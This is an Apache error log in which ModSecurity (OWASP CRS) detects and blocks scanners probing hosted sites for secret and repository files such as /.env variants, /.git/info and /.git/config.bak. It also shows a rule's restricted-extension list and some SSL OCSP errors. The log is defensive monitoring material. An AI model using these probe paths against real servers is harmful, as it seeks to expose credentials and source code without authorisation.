[Mon May 11 11:43:35.579208 2026] [security2:error] [pid 1254328:tid 1254344] [client 213.209.159.175:3392] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/API/.env"] [unique_id "agGkx0Rdw2n9wv6Ai48FBwAAAI0"]
[Mon May 11 11:43:35.579424 2026] [security2:error] [pid 1254328:tid 1254344] [client 213.209.159.175:3392] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/API/.env"] [unique_id "agGkx0Rdw2n9wv6Ai48FBwAAAI0"]
[Mon May 11 11:43:35.580645 2026] [security2:error] [pid 1254328:tid 1254344] [client 213.209.159.175:3392] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agGkx0Rdw2n9wv6Ai48FBwAAAI0"]
[Mon May 11 11:43:35.671925 2026] [security2:error] [pid 1256241:tid 1256259] [client 213.209.159.175:3412] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /src/.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/src/.env.bak"] [unique_id "agGkx5kIEwRJMyDaV55LqgAAAU0"]
[Mon May 11 11:43:35.672146 2026] [security2:error] [pid 1256241:tid 1256259] [client 213.209.159.175:3412] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/src/.env.bak"] [unique_id "agGkx5kIEwRJMyDaV55LqgAAAU0"]
[Mon May 11 11:43:35.673101 2026] [security2:error] [pid 1256241:tid 1256259] [client 213.209.159.175:3412] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agGkx5kIEwRJMyDaV55LqgAAAU0"]
[Mon May 11 11:43:35.720167 2026] [security2:error] [pid 1254212:tid 1254220] [client 213.209.159.175:3418] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /projeto/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/projeto/.env"] [unique_id "agGkx0YQeUtAPynIs6xVjgAAAAY"]
[Mon May 11 11:43:35.720384 2026] [security2:error] [pid 1254212:tid 1254220] [client 213.209.159.175:3418] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/projeto/.env"] [unique_id "agGkx0YQeUtAPynIs6xVjgAAAAY"]
[Mon May 11 11:43:35.723310 2026] [security2:error] [pid 1254212:tid 1254220] [client 213.209.159.175:3418] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agGkx0YQeUtAPynIs6xVjgAAAAY"]
[Mon May 11 11:43:35.766663 2026] [security2:error] [pid 1254133:tid 1254142] [client 213.209.159.175:3428] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /tmp/.env.uat"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/tmp/.env.uat"] [unique_id "agGkxxjZymfuKpjWXeh5ywAAAMY"]
[Mon May 11 11:43:35.766884 2026] [security2:error] [pid 1254133:tid 1254142] [client 213.209.159.175:3428] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/tmp/.env.uat"] [unique_id "agGkxxjZymfuKpjWXeh5ywAAAMY"]
[Mon May 11 11:43:35.781387 2026] [security2:error] [pid 1254133:tid 1254142] [client 213.209.159.175:3428] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agGkxxjZymfuKpjWXeh5ywAAAMY"]
[Mon May 11 11:43:35.811266 2026] [security2:error] [pid 1254328:tid 1254346] [client 213.209.159.175:3436] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /reactjs/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/reactjs/.env"] [unique_id "agGkx0Rdw2n9wv6Ai48FCAAAAJA"]
[Mon May 11 11:43:35.811484 2026] [security2:error] [pid 1254328:tid 1254346] [client 213.209.159.175:3436] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/reactjs/.env"] [unique_id "agGkx0Rdw2n9wv6Ai48FCAAAAJA"]
[Mon May 11 11:43:35.812779 2026] [security2:error] [pid 1254328:tid 1254346] [client 213.209.159.175:3436] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agGkx0Rdw2n9wv6Ai48FCAAAAJA"]
[Mon May 11 11:43:35.859591 2026] [security2:error] [pid 1254179:tid 1254203] [client 213.209.159.175:3446] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /adminapp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/adminapp/.env"] [unique_id "agGkx2S6k_SCYd1AVZqr0gAAARY"]
[Mon May 11 11:43:35.859815 2026] [security2:error] [pid 1254179:tid 1254203] [client 213.209.159.175:3446] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/adminapp/.env"] [unique_id "agGkx2S6k_SCYd1AVZqr0gAAARY"]
[Mon May 11 11:43:35.860929 2026] [security2:error] [pid 1254179:tid 1254203] [client 213.209.159.175:3446] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agGkx2S6k_SCYd1AVZqr0gAAARY"]
[Mon May 11 11:43:55.284631 2026] [security2:error] [pid 1254179:tid 1254182] [client 185.177.72.9:43780] ModSecurity: Warning. Matched phrase "/.gitignore" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.gitignore found within REQUEST_FILENAME: /.gitignore"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/.gitignore"] [unique_id "agGk22S6k_SCYd1AVZqr5QAAAQE"]
[Mon May 11 11:43:55.284844 2026] [security2:error] [pid 1254179:tid 1254182] [client 185.177.72.9:43780] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/.gitignore"] [unique_id "agGk22S6k_SCYd1AVZqr5QAAAQE"]
[Mon May 11 11:43:57.555661 2026] [security2:error] [pid 1254179:tid 1254182] [client 185.177.72.9:43780] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGk22S6k_SCYd1AVZqr5QAAAQE"]
[Mon May 11 11:43:57.582320 2026] [security2:error] [pid 1254179:tid 1254201] [client 185.177.72.9:43784] ModSecurity: Warning. Matched phrase "/.gitignore" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.gitignore found within REQUEST_FILENAME: /.gitignore"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/.gitignore"] [unique_id "agGk3WS6k_SCYd1AVZqr5gAAARQ"]
[Mon May 11 11:43:57.583032 2026] [security2:error] [pid 1254179:tid 1254201] [client 185.177.72.9:43784] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/.gitignore"] [unique_id "agGk3WS6k_SCYd1AVZqr5gAAARQ"]
[Mon May 11 11:43:59.643343 2026] [security2:error] [pid 1254179:tid 1254201] [client 185.177.72.9:43784] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGk3WS6k_SCYd1AVZqr5gAAARQ"]
[Mon May 11 11:44:01.110329 2026] [authz_core:error] [pid 1254328:tid 1254339] [client 47.128.126.108:25626] AH01630: client denied by server configuration: /home/maelbail/public_html/wp-includes/block-supports/error_log
[Mon May 11 11:44:03.641270 2026] [ssl:error] [pid 1254179:tid 1254193] (EAI 2)Name or service not known: [client 3.87.26.21:20618] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 11:44:03.641318 2026] [ssl:error] [pid 1254179:tid 1254193] AH01941: stapling_renew_response: responder error
[Mon May 11 11:44:03.933069 2026] [ssl:error] [pid 1256241:tid 1256270] (EAI 2)Name or service not known: [client 3.87.26.21:13687] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 11:44:03.933109 2026] [ssl:error] [pid 1256241:tid 1256270] AH01941: stapling_renew_response: responder error
[Mon May 11 11:44:13.352830 2026] [security2:error] [pid 1254328:tid 1254379] [client 185.177.72.9:22226] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/info"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/.git/info"] [unique_id "agGk7URdw2n9wv6Ai48FfQAAAJY"]
[Mon May 11 11:44:13.353288 2026] [security2:error] [pid 1254328:tid 1254379] [client 185.177.72.9:22226] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/.git/info"] [unique_id "agGk7URdw2n9wv6Ai48FfQAAAJY"]
[Mon May 11 11:44:14.524904 2026] [security2:error] [pid 1254328:tid 1254379] [client 185.177.72.9:22226] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGk7URdw2n9wv6Ai48FfQAAAJY"]
[Mon May 11 11:44:14.550803 2026] [security2:error] [pid 1254212:tid 1254235] [client 185.177.72.9:22228] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/info"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/.git/info"] [unique_id "agGk7kYQeUtAPynIs6xVrAAAABU"]
[Mon May 11 11:44:14.551007 2026] [security2:error] [pid 1254212:tid 1254235] [client 185.177.72.9:22228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/.git/info"] [unique_id "agGk7kYQeUtAPynIs6xVrAAAABU"]
[Mon May 11 11:44:15.788382 2026] [security2:error] [pid 1254212:tid 1254235] [client 185.177.72.9:22228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGk7kYQeUtAPynIs6xVrAAAABU"]
[Mon May 11 11:44:15.814581 2026] [security2:error] [pid 1256241:tid 1256249] [client 185.177.72.9:22238] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "jeanboyault.fr"] [uri "/.git/config.bak"] [unique_id "agGk75kIEwRJMyDaV55MIwAAAUM"]
[Mon May 11 11:44:15.815000 2026] [security2:error] [pid 1256241:tid 1256249] [client 185.177.72.9:22238] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/.git/config.bak"] [unique_id "agGk75kIEwRJMyDaV55MIwAAAUM"]
[Mon May 11 11:44:15.815376 2026] [security2:error] [pid 1256241:tid 1256249] [client 185.177.72.9:22238] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/.git/config.bak"] [unique_id "agGk75kIEwRJMyDaV55MIwAAAUM"]
[Mon May 11 11:44:17.047001 2026] [security2:error] [pid 1256241:tid 1256249] [client 185.177.72.9:22238] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGk75kIEwRJMyDaV55MIwAAAUM"]
[Mon May 11 11:44:17.072929 2026] [security2:error] [pid 1254212:tid 1254219] [client 185.177.72.9:22250] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.jeanboyault.fr"] [uri "/.git/config.bak"] [unique_id "agGk8UYQeUtAPynIs6xVswAAAAU"]
[Mon May 11 11:44:17.073925 2026] [security2:error] [pid 1254212:tid 1254219] [client 185.177.72.9:22250] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/.git/config.bak"] [unique_id "agGk8UYQeUtAPynIs6xVswAAAAU"]
[Mon May 11 11:44:17.074129 2026] [security2:error] [pid 1254212:tid 1254219] [client 185.177.72.9:22250] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/.git/config.bak"] [unique_id "agGk8UYQeUtAPynIs6xVswAAAAU"]
